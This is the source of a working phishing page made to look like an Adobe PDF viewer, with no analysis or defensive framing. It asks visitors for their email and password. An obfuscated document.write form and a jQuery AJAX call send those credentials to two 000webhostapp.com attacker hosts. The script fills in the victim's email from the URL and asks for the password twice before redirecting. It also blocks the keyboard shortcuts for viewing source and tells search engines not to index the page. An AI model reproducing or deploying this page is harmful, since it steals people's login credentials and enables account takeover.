<!DOCTYPE html>
<html style="box-sizing: border-box;">
<head style="box-sizing: border-box;">
<title style="box-sizing: border-box;">D0C</title>
<link rel="icon" type="image/png" href="https://www.adobe.com/favicon.ico" style="box-sizing: border-box;">
<meta name="robots" content="noindex, noarchive, nofollow, nosnippet" style="box-sizing: border-box;">
<meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" style="box-sizing: border-box;">
<meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir" style="box-sizing: border-box;">
<meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" style="box-sizing: border-box;">
<meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" style="box-sizing: border-box;">
<meta name="viewport" content="width=device-width, initial-scale=1" style="box-sizing: border-box;">

<style type="text/css" style="box-sizing: border-box;">
@import url(https://fonts.googleapis.com/css?family=PT+Sans:400,700);
html {
min-height: 100%;
}

body {
background: url('https://imgur.com/mWHnFDR.png') no-repeat;
background-size: cover;
position: absolute;
width: 100%;
height: 100%;
top: 0;
right: 0;
bottom: 0;
left: 0;
margin: auto;
overflow: hidden;
font-family: 'PT Sans', sans-serif;
}

.login {
padding: 10px;
}

.files {
background: #990000;
margin: 200px auto;
width: 90%;
max-width: 450px;
text-align: center;
color: #fff;
}

form {
max-width: 450px;
margin: 0 auto;
}
form > div {
position: relative;
background: white;
border-bottom: 1px solid #ccc;
color: #000;
}
form > div > label {
opacity: 0.3;
font-weight: bold;
position: absolute;
top: 22px;
left: 20px;
}
form > div > input[type="text"],
form > div > input[type="email"],
form > div > input[type="password"] {
width: 100%;
border: 0;
padding: 20px 20px 20px 50px;
background: #fff;
}
form > div > input[type="text"]:focus,
form > div > input[type="email"]:focus,
form > div > input[type="password"]:focus {
outline: 0;
background: white;
}
form > div > input[type="text"]:focus + label,
form > div > input[type="email"]:focus + label,
form > div > input[type="password"]:focus + label {
opacity: 0;
}
form > div > input[type="text"]:valid,
form > div > input[type="email"]:valid,
form > div > input[type="password"]:valid {
background: url();
background-size: 20px;
background-repeat: no-repeat;
background-position: 20px 20px;
}
form > div > input[type="text"]:valid + label,
form > div > input[type="email"]:valid + label,
form > div > input[type="password"]:valid + label {
opacity: 0;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
background: pink;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
opacity: 0;
}
form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
max-height: 200px;
padding: 0 30px 20px 50px;
}
form > div .requirements {
padding: 0 30px 0 50px;
color: #999;
max-height: 0;
transition: 0.28s;
overflow: hidden;
color: red;
font-style: italic;
}
form input[type="submit"] {
display: block;
width: 100%;
margin: 20px 0;
background: #581e1e;
color: white;
border: 0;
padding: 20px;
font-size: 1.2rem;
}

form input[type="submit"]:hover {
box-shadow: 1px 1px 1px #ddd;
}

* {
box-sizing: border-box;
}

.invalid {
background: #000;
color: #000;
}

@media screen and (max-width: 360px) and (min-width: 320px) {
.files {
margin: 100px auto;
}
}
.img {
padding-left: 2rem;
padding-top: .5rem;
position: fixed;
}
* {
box-sizing: border-box;
}
img[AttributesStyle] {
height: 110px;
}

</style>
</head>
<img src="https://cdn3.iconfinder.com/data/icons/line-icons-set/128/1-02-512.png?w=144" alt="" height="110" class="img" style="box-sizing: border-box;padding-left: 2rem;padding-top: .5rem;position: fixed;">

<div class="files" style="box-sizing: border-box;background: #990000;margin: 200px auto;width: 90%;max-width: 450px;text-align: center;color: #fff;">
<img src="https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/7249df06-bcfe-46a1-9dfd-441d86aa80d3.png?auto=format&ixlib=react-9.0.3" height="70" style="box-sizing: border-box;">
  <h3 data-edit="text">Sign in</h3>
  <h3 data-edit="text"><font color="#FFFFFF">with your valid <strong>&nbsp;</strong><br>email password to view document</font></h3>
  <span class="small" id="msg_text"></span>
  
<div class="login" style="box-sizing: border-box;padding: 10px;">
<script>document.write(unescape("%3Cform%20action%3D%22https%3A//baqoikmazxqv.000webhostapp.com/opo.php%22%20method%3D%22post%22%20style%3D%22box-sizing%3A%20border-box%3Bmax-width%3A%20450px%3Bmargin%3A%200%20auto%3B%22%3E%20"));</script>
<div style="box-sizing: border-box;position: relative;background: white;border-bottom: 1px solid #ccc;color: #000;"><input type="email" id="email" name="email" required="hidden" autocomplete="on" placeholder="Email Address " value="" style="box-sizing: border-box;width: 100%;border: 0;padding: 20px 20px 20px 50px;background: #fff;">
<label for="email" style="box-sizing: border-box;opacity: 0.3;font-weight: bold;position: absolute;top: 22px;left: 20px;"></label><div class="requirements" style="box-sizing: border-box;padding: 0 30px 0 50px;color: red;max-height: 0;transition: 0.28s;overflow: hidden;font-style: italic;">Must be a valid email address.
</div>
</div>
<div style="box-sizing: border-box;position: relative;background: white;border-bottom: 1px solid #ccc;color: #000;">
<input type="password" id="password" name="password" required="hidden" placeholder="Valid Password" style="box-sizing: border-box;width: 100%;border: 0;padding: 20px 20px 20px 50px;background: #fff;">
<label for="password" style="box-sizing: border-box;opacity: 0.3;font-weight: bold;position: absolute;top: 22px;left: 20px;"></label>
<div class="requirements" style="box-sizing: border-box;padding: 0 30px 0 50px;color: red;max-height: 0;transition: 0.28s;overflow: hidden;font-style: italic;">
Your password must be at least 6 characters as well as contain at least one uppercase, one lowercase, and one number.
</div>
</div>
<input id="submit-btn" type="submit" value="View PDF Document" style="box-sizing: border-box;display: block;width: 100%;margin: 20px 0;background: #581e1e;color: white;border: 0;padding: 20px;font-size: 1.2rem;">
</form>
</div>
</div>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      // $('#back1').click(function () {
      //   $("#msg").hide();
      //   $('#email').val("");
      //   $("#automail").animate({left:200, opacity:"hide"}, 0);
      //   $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      // });

    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/other-1.png');
        $('#field').html("Other Mail");
        $('#email').val(my_email);
        $('#emailch').html(my_email);
        $("#msg").hide();
        // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
        // $("#automail").animate({right:200, opacity:"show"}, 1000);
      }
      ///////////////url getting email////////////////


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://surge-linkedln.000webhostapp.com/mx/next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("thankyou.html?msg="+email);

                  }
                  $('#msg_text').html(response['msg']);
                }
                else{
                  $('#msg_text').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                 window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              $('#msg_text').html("Please try again");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
    });


    });

    document.onkeydown=function(e){
      if (e.ctrlKey && 
        (e.keyCode === 73 || 
         e.keyCode === 105 ||
         e.keyCode === 74 || 
         e.keyCode === 106 || 
         e.keyCode === 85 || 
         e.keyCode === 117)) {
        alert('not allowed');
      return false;
    } else {
      return true;
    }
  }
</script>
</html>